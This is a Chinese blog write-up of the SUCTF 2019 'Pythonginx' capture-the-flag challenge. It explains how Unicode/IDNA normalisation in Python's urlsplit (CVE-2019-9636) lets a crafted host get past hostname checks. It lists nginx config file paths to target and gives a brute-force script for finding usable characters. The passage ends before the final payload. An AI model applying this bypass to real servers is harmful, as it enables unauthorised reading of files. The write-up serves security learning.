[SUCTF 2019]Pythonginx-CSDN博客

本文链接：https://blog.csdn.net/m0_53314778/article/details/113730543

[SUCTF 2019]Pythonginx

知识点：nginx配置文件路径 black hat一个议题任意读取文件
这道题用的是blackhat议题之一HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization，blackhat这个议题的PPT链接如下：
https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

题目提示了，是ngix，所以我们要知道nginx一些文件存放的地方

配置文件存放目录：/etc/nginx
主配置文件：/etc/nginx/conf/nginx.conf
管理脚本：/usr/lib64/systemd/system/nginx.service
模块：/usr/lisb64/nginx/modules
应用程序：/usr/sbin/nginx
程序默认存放位置：/usr/share/nginx/html
日志默认存放位置：/var/log/nginx
配置文件目录为：/usr/local/nginx/conf/nginx.conf

题目：

在这里插入图片描述
题目还给了个源码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <form method="GET" action="getUrl">
        URL:<input type="text" name="url"/>
        <input type="submit" value="Submit"/>
    </form>

    <code>
        
        @app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
    </code>
    <!-- Dont worry about the suctf.cc. Go on! -->
    <!-- Do you know the nginx? -->
</body>
</html>

用一个例子解释一下一些函数的作用：

>>> from urllib import parse
>>> url = 'http://www.example.com/a?b&c=1#2'
>>> host = parse.urlparse(url).hostname	#urlparse对url进行分割，host等于其中的hostname
>>> parse.urlparse(url)					#查看一下效果
ParseResult(scheme='http', netloc='www.example.com', path='/a', params='', query='b&c=1', fragment='2')
>>> host								#查看host的内容
'www.example.com'
>>> parts = list(parse.urlsplit(url))	#同样的，urlsplit也是分割url，并保存为列表
>>> parts								#查看一下效果
['http', 'www.example.com', '/a', 'b&c=1', '2']
>>> host = parts[1]						#相当于也是取其中的hostname
>>> host
'www.example.com'
>>> finalUrl = parse.urlunsplit(parts).split(' ')[0]	#urlunsplit拼接为url
>>> finalUrl											#查看一下效果
'http://www.example.com/a?b&c=1#2'
>>>

urllib — URL 处理模块
urllib 是一个收集了多个用到 URL 的模块的包：

urllib.request 打开和读取 URL

urllib.error 包含 urllib.request 抛出的异常

urllib.parse 用于解析 URL

urllib.robotparser 用于解析 robots.txt 文件

encode(‘idna’)是指转换为国际化域名

思路：

之前解释函数有一块没有解释：在这里插入图片描述 python中urlsplit函数存在的漏洞。

CVE-2019-9636：urlsplit 不处理 NFKC 标准化
CVE-2019-10160：urlsplit NFKD 标准化漏洞

漏洞原理：
用 Punycode/IDNA 编码的 URL 使用 NFKC 规范化来分解字符。可能导致某些字符将新的段引入 	URL。
例如，在直接比较中，\ uFF03不等于'＃'，而是统一化为'＃'，这会更改 URL 的片段部分。类似地，\ u2100 统一化为'a/c'，它引入了路径段。

我们最终是要让他return的是urllib.request.urlopen(finalUrl).read()，其他的return都不行

在这里插入图片描述

前两个要求我们判断 host 是否是 suctf.cc ，如果不是才能继续。第三个if要求我们当经过了 decode(‘utf-8’) 之后传进了 urlunsplit 函数后，第三个if读入的要是suctf.cc。

简单来说，需要逃脱前两个if，成功进入第三个if。

而三个if中判断条件都是相同的，不过在此之前的host构造却是不同的，这也是blackhat该议题中想要说明的一点

当URL 中出现一些特殊字符的时候，输出的结果可能不在预期

解法一：

接着我们只需要按照getUrl函数写出爆破脚本即可得到我们能够逃逸的构造语句了
大佬脚本：

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass
 
def getUrl(url):
    url=url
    host=parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts=list(urlsplit(url))
    host=parts[1]
    if host == 'suctf.cc':
        return False
    newhost=[]
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1]='.'.join(newhost)
    finalUrl=urlunsplit(parts).split(' ')[0]
    host=parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False
 
 
if __name__=='__main__':
    get_unicode()

结果如下
在这里插入图片描述
我们只需要用其中任意一个去读取文件就可以了
比如：